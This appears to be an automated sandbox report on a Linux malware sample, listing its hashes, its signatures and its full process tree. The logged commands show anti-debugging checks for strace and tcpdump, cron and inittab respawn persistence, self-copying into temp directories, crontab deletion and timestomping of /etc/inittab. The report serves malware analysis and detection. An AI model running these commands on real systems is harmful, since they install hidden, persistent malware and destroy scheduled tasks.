Analysis

  • max time kernel
    0s
  • max time network
    102s
  • platform
    linux_amd64
  • resource
    ubuntu1804-amd64-en-20211208
  • submitted
    14-03-2022 03:23

General

  • Target

    60f50372901a3ab6be093cb9922fd75c

  • Size

    90KB

  • MD5

    60f50372901a3ab6be093cb9922fd75c

  • SHA1

    03fabbbc736a5c59b889e3675331c96263d4a4a6

  • SHA256

    16b4093813e2923e9ee70b888f0d50f972ac607253b00f25e4be44993d263bd2

  • SHA512

    480ce401e171d29483b5ddf2b732f8959daba11c8b25538d179cc93795594676aaec3ae078cd312743a9cecf78ba533a58ced339fa63e2b5e53b9077933d0e6b

Score
5/10

Malware Config

Signatures

  • Reads runtime system information 4 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 4 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • ./60f50372901a3ab6be093cb9922fd75c
    ./60f50372901a3ab6be093cb9922fd75c
    1⤵
      PID:593
    • /bin/sh
      sh -c "pidof -x strace > /dev/null"
      1⤵
        PID:594
        • /bin/pidof
          pidof -x strace
          2⤵
            PID:595
        • /bin/sh
          sh -c "pidof -x tcpdump > /dev/null"
          1⤵
            PID:596
            • /bin/pidof
              pidof -x tcpdump
              2⤵
                PID:597
            • /bin/sh
              sh -c "cat /etc/inittab | grep -v \"/tmp/60f50372901a3ab6be093cb9922fd75c\" > /etc/inittab2"
              1⤵
                PID:600
                • /bin/cat
                  cat /etc/inittab
                  2⤵
                    PID:602
                  • /bin/grep
                    grep -v /tmp/60f50372901a3ab6be093cb9922fd75c
                    2⤵
                      PID:605
                  • /bin/sh
                    sh -c "crontab -l | grep /tmp/60f50372901a3ab6be093cb9922fd75c | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /tmp/60f50372901a3ab6be093cb9922fd75c > /dev/null 2>&1 &\") | crontab -"
                    1⤵
                      PID:601
                      • /usr/bin/crontab
                        crontab -l
                        2⤵
                          PID:604
                        • /bin/grep
                          grep /tmp/60f50372901a3ab6be093cb9922fd75c
                          2⤵
                            PID:607
                          • /bin/grep
                            grep -v "no cron"
                            2⤵
                              PID:608
                            • /usr/bin/crontab
                              crontab -
                              2⤵
                                PID:611
                            • /bin/sh
                              sh -c "crontab -r"
                              1⤵
                                PID:603
                                • /usr/bin/crontab
                                  crontab -r
                                  2⤵
                                    PID:606
                                • /bin/sh
                                  sh -c "echo \"0:2345:respawn:/tmp/60f50372901a3ab6be093cb9922fd75c\" >> /etc/inittab2"
                                  1⤵
                                    PID:609
                                  • /bin/sh
                                    sh -c "cat /etc/inittab2 > /etc/inittab"
                                    1⤵
                                      PID:612
                                      • /bin/cat
                                        cat /etc/inittab2
                                        2⤵
                                          PID:614
                                      • /usr/bin/crontab
                                        crontab -l
                                        1⤵
                                          PID:613
                                        • /bin/sh
                                          sh -c "rm -rf /etc/inittab2"
                                          1⤵
                                            PID:615
                                            • /bin/rm
                                              rm -rf /etc/inittab2
                                              2⤵
                                                PID:616
                                            • /bin/sh
                                              sh -c "touch -acmr /bin/ls /etc/inittab"
                                              1⤵
                                                PID:617
                                                • /usr/bin/touch
                                                  touch -acmr /bin/ls /etc/inittab
                                                  2⤵
                                                    PID:618
                                                • /bin/sh
                                                  sh -c "/bin/uname -n"
                                                  1⤵
                                                    PID:625
                                                    • /bin/uname
                                                      /bin/uname -n
                                                      2⤵
                                                        PID:627
                                                    • /bin/sh
                                                      sh -c "cp -f /tmp/60f50372901a3ab6be093cb9922fd75c /dev/shm/60f50372901a3ab6be093cb9922fd75c"
                                                      1⤵
                                                        PID:626
                                                        • /bin/cp
                                                          cp -f /tmp/60f50372901a3ab6be093cb9922fd75c /dev/shm/60f50372901a3ab6be093cb9922fd75c
                                                          2⤵
                                                          • Reads runtime system information
                                                          • Writes file to tmp directory
                                                          PID:628
                                                      • /bin/sh
                                                        sh -c "cat /etc/inittab | grep -v \"/dev/shm/60f50372901a3ab6be093cb9922fd75c\" > /etc/inittab2"
                                                        1⤵
                                                          PID:630
                                                          • /bin/grep
                                                            grep -v /dev/shm/60f50372901a3ab6be093cb9922fd75c
                                                            2⤵
                                                              PID:633
                                                            • /bin/cat
                                                              cat /etc/inittab
                                                              2⤵
                                                                PID:632
                                                            • /bin/sh
                                                              sh -c "crontab -l | grep /dev/shm/60f50372901a3ab6be093cb9922fd75c | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /dev/shm/60f50372901a3ab6be093cb9922fd75c > /dev/null 2>&1 &\") | crontab -"
                                                              1⤵
                                                                PID:631
                                                                • /usr/bin/crontab
                                                                  crontab -l
                                                                  2⤵
                                                                    PID:634
                                                                  • /bin/grep
                                                                    grep /dev/shm/60f50372901a3ab6be093cb9922fd75c
                                                                    2⤵
                                                                      PID:635
                                                                    • /bin/grep
                                                                      grep -v "no cron"
                                                                      2⤵
                                                                        PID:637
                                                                      • /usr/bin/crontab
                                                                        crontab -
                                                                        2⤵
                                                                          PID:641
                                                                      • /bin/sh
                                                                        sh -c "echo \"0:2345:respawn:/dev/shm/60f50372901a3ab6be093cb9922fd75c\" >> /etc/inittab2"
                                                                        1⤵
                                                                          PID:636
                                                                        • /bin/sh
                                                                          sh -c "cat /etc/inittab2 > /etc/inittab"
                                                                          1⤵
                                                                            PID:638
                                                                            • /bin/cat
                                                                              cat /etc/inittab2
                                                                              2⤵
                                                                                PID:639
                                                                            • /usr/bin/crontab
                                                                              crontab -l
                                                                              1⤵
                                                                                PID:642
                                                                              • /bin/sh
                                                                                sh -c "rm -rf /etc/inittab2"
                                                                                1⤵
                                                                                  PID:643
                                                                                  • /bin/rm
                                                                                    rm -rf /etc/inittab2
                                                                                    2⤵
                                                                                      PID:644
                                                                                  • /bin/sh
                                                                                    sh -c "touch -acmr /bin/ls /etc/inittab"
                                                                                    1⤵
                                                                                      PID:645
                                                                                      • /usr/bin/touch
                                                                                        touch -acmr /bin/ls /etc/inittab
                                                                                        2⤵
                                                                                          PID:646
                                                                                      • /bin/sh
                                                                                        sh -c "cp -f /tmp/60f50372901a3ab6be093cb9922fd75c /var/tmp/60f50372901a3ab6be093cb9922fd75c"
                                                                                        1⤵
                                                                                          PID:647
                                                                                          • /bin/cp
                                                                                            cp -f /tmp/60f50372901a3ab6be093cb9922fd75c /var/tmp/60f50372901a3ab6be093cb9922fd75c
                                                                                            2⤵
                                                                                            • Reads runtime system information
                                                                                            • Writes file to tmp directory
                                                                                            PID:648
                                                                                        • /bin/sh
                                                                                          sh -c "cat /etc/inittab | grep -v \"/var/tmp/60f50372901a3ab6be093cb9922fd75c\" > /etc/inittab2"
                                                                                          1⤵
                                                                                            PID:650
                                                                                            • /bin/cat
                                                                                              cat /etc/inittab
                                                                                              2⤵
                                                                                                PID:651
                                                                                              • /bin/grep
                                                                                                grep -v /var/tmp/60f50372901a3ab6be093cb9922fd75c
                                                                                                2⤵
                                                                                                  PID:654
                                                                                              • /bin/sh
                                                                                                sh -c "crontab -l | grep /var/tmp/60f50372901a3ab6be093cb9922fd75c | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/tmp/60f50372901a3ab6be093cb9922fd75c > /dev/null 2>&1 &\") | crontab -"
                                                                                                1⤵
                                                                                                  PID:652
                                                                                                  • /usr/bin/crontab
                                                                                                    crontab -l
                                                                                                    2⤵
                                                                                                      PID:653
                                                                                                    • /bin/grep
                                                                                                      grep /var/tmp/60f50372901a3ab6be093cb9922fd75c
                                                                                                      2⤵
                                                                                                        PID:655
                                                                                                      • /bin/grep
                                                                                                        grep -v "no cron"
                                                                                                        2⤵
                                                                                                          PID:657
                                                                                                        • /usr/bin/crontab
                                                                                                          crontab -
                                                                                                          2⤵
                                                                                                            PID:660
                                                                                                        • /bin/sh
                                                                                                          sh -c "echo \"0:2345:respawn:/var/tmp/60f50372901a3ab6be093cb9922fd75c\" >> /etc/inittab2"
                                                                                                          1⤵
                                                                                                            PID:656
                                                                                                          • /bin/sh
                                                                                                            sh -c "cat /etc/inittab2 > /etc/inittab"
                                                                                                            1⤵
                                                                                                              PID:658
                                                                                                              • /bin/cat
                                                                                                                cat /etc/inittab2
                                                                                                                2⤵
                                                                                                                  PID:661
                                                                                                              • /usr/bin/crontab
                                                                                                                crontab -l
                                                                                                                1⤵
                                                                                                                  PID:662
                                                                                                                • /bin/sh
                                                                                                                  sh -c "rm -rf /etc/inittab2"
                                                                                                                  1⤵
                                                                                                                    PID:663
                                                                                                                    • /bin/rm
                                                                                                                      rm -rf /etc/inittab2
                                                                                                                      2⤵
                                                                                                                        PID:664
                                                                                                                    • /bin/sh
                                                                                                                      sh -c "touch -acmr /bin/ls /etc/inittab"
                                                                                                                      1⤵
                                                                                                                        PID:665
                                                                                                                        • /usr/bin/touch
                                                                                                                          touch -acmr /bin/ls /etc/inittab
                                                                                                                          2⤵
                                                                                                                            PID:666
                                                                                                                        • /bin/sh
                                                                                                                          sh -c "cp -f /tmp/60f50372901a3ab6be093cb9922fd75c /var/lock/60f50372901a3ab6be093cb9922fd75c"
                                                                                                                          1⤵
                                                                                                                            PID:667
                                                                                                                            • /bin/cp
                                                                                                                              cp -f /tmp/60f50372901a3ab6be093cb9922fd75c /var/lock/60f50372901a3ab6be093cb9922fd75c
                                                                                                                              2⤵
                                                                                                                              • Reads runtime system information
                                                                                                                              • Writes file to tmp directory
                                                                                                                              PID:668
                                                                                                                          • /bin/sh
                                                                                                                            sh -c "cat /etc/inittab | grep -v \"/var/lock/60f50372901a3ab6be093cb9922fd75c\" > /etc/inittab2"
                                                                                                                            1⤵
                                                                                                                              PID:670
                                                                                                                              • /bin/cat
                                                                                                                                cat /etc/inittab
                                                                                                                                2⤵
                                                                                                                                  PID:671
                                                                                                                                • /bin/grep
                                                                                                                                  grep -v /var/lock/60f50372901a3ab6be093cb9922fd75c
                                                                                                                                  2⤵
                                                                                                                                    PID:673
                                                                                                                                • /bin/sh
                                                                                                                                  sh -c "crontab -l | grep /var/lock/60f50372901a3ab6be093cb9922fd75c | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/lock/60f50372901a3ab6be093cb9922fd75c > /dev/null 2>&1 &\") | crontab -"
                                                                                                                                  1⤵
                                                                                                                                    PID:672
                                                                                                                                    • /usr/bin/crontab
                                                                                                                                      crontab -l
                                                                                                                                      2⤵
                                                                                                                                        PID:674
                                                                                                                                      • /bin/grep
                                                                                                                                        grep /var/lock/60f50372901a3ab6be093cb9922fd75c
                                                                                                                                        2⤵
                                                                                                                                          PID:675
                                                                                                                                        • /bin/grep
                                                                                                                                          grep -v "no cron"
                                                                                                                                          2⤵
                                                                                                                                            PID:677
                                                                                                                                          • /usr/bin/crontab
                                                                                                                                            crontab -
                                                                                                                                            2⤵
                                                                                                                                              PID:680
                                                                                                                                          • /bin/sh
                                                                                                                                            sh -c "echo \"0:2345:respawn:/var/lock/60f50372901a3ab6be093cb9922fd75c\" >> /etc/inittab2"
                                                                                                                                            1⤵
                                                                                                                                              PID:676
                                                                                                                                            • /bin/sh
                                                                                                                                              sh -c "cat /etc/inittab2 > /etc/inittab"
                                                                                                                                              1⤵
                                                                                                                                                PID:678
                                                                                                                                                • /bin/cat
                                                                                                                                                  cat /etc/inittab2
                                                                                                                                                  2⤵
                                                                                                                                                    PID:681
                                                                                                                                                • /usr/bin/crontab
                                                                                                                                                  crontab -l
                                                                                                                                                  1⤵
                                                                                                                                                    PID:682
                                                                                                                                                  • /bin/sh
                                                                                                                                                    sh -c "rm -rf /etc/inittab2"
                                                                                                                                                    1⤵
                                                                                                                                                      PID:683
                                                                                                                                                      • /bin/rm
                                                                                                                                                        rm -rf /etc/inittab2
                                                                                                                                                        2⤵
                                                                                                                                                          PID:684
                                                                                                                                                      • /bin/sh
                                                                                                                                                        sh -c "touch -acmr /bin/ls /etc/inittab"
                                                                                                                                                        1⤵
                                                                                                                                                          PID:685
                                                                                                                                                          • /usr/bin/touch
                                                                                                                                                            touch -acmr /bin/ls /etc/inittab
                                                                                                                                                            2⤵
                                                                                                                                                              PID:686
                                                                                                                                                          • /bin/sh
                                                                                                                                                            sh -c "cp -f /tmp/60f50372901a3ab6be093cb9922fd75c /var/run/60f50372901a3ab6be093cb9922fd75c"
                                                                                                                                                            1⤵
                                                                                                                                                              PID:687
                                                                                                                                                              • /bin/cp
                                                                                                                                                                cp -f /tmp/60f50372901a3ab6be093cb9922fd75c /var/run/60f50372901a3ab6be093cb9922fd75c
                                                                                                                                                                2⤵
                                                                                                                                                                • Reads runtime system information
                                                                                                                                                                • Writes file to tmp directory
                                                                                                                                                                PID:688
                                                                                                                                                            • /bin/sh
                                                                                                                                                              sh -c "cat /etc/inittab | grep -v \"/var/run/60f50372901a3ab6be093cb9922fd75c\" > /etc/inittab2"
                                                                                                                                                              1⤵
                                                                                                                                                                PID:690
                                                                                                                                                                • /bin/grep
                                                                                                                                                                  grep -v /var/run/60f50372901a3ab6be093cb9922fd75c
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:693
                                                                                                                                                                  • /bin/cat
                                                                                                                                                                    cat /etc/inittab
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:692
                                                                                                                                                                  • /bin/sh
                                                                                                                                                                    sh -c "crontab -l | grep /var/run/60f50372901a3ab6be093cb9922fd75c | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/run/60f50372901a3ab6be093cb9922fd75c > /dev/null 2>&1 &\") | crontab -"
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:691
                                                                                                                                                                      • /usr/bin/crontab
                                                                                                                                                                        crontab -l
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:694
                                                                                                                                                                        • /bin/grep
                                                                                                                                                                          grep /var/run/60f50372901a3ab6be093cb9922fd75c
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:695
                                                                                                                                                                          • /bin/grep
                                                                                                                                                                            grep -v "no cron"
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:697
                                                                                                                                                                            • /usr/bin/crontab
                                                                                                                                                                              crontab -
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:701
                                                                                                                                                                            • /bin/sh
                                                                                                                                                                              sh -c "echo \"0:2345:respawn:/var/run/60f50372901a3ab6be093cb9922fd75c\" >> /etc/inittab2"
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:696
                                                                                                                                                                              • /bin/sh
                                                                                                                                                                                sh -c "cat /etc/inittab2 > /etc/inittab"
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:698
                                                                                                                                                                                  • /bin/cat
                                                                                                                                                                                    cat /etc/inittab2
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:699
                                                                                                                                                                                  • /usr/bin/crontab
                                                                                                                                                                                    crontab -l
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:702
                                                                                                                                                                                    • /bin/sh
                                                                                                                                                                                      sh -c "rm -rf /etc/inittab2"
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:703
                                                                                                                                                                                        • /bin/rm
                                                                                                                                                                                          rm -rf /etc/inittab2
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:704
                                                                                                                                                                                        • /bin/sh
                                                                                                                                                                                          sh -c "touch -acmr /bin/ls /etc/inittab"
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:705
                                                                                                                                                                                            • /usr/bin/touch
                                                                                                                                                                                              touch -acmr /bin/ls /etc/inittab
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:706

                                                                                                                                                                                            Network

                                                                                                                                                                                            MITRE ATT&CK Matrix

                                                                                                                                                                                            Replay Monitor

                                                                                                                                                                                            Loading Replay Monitor...

                                                                                                                                                                                            Downloads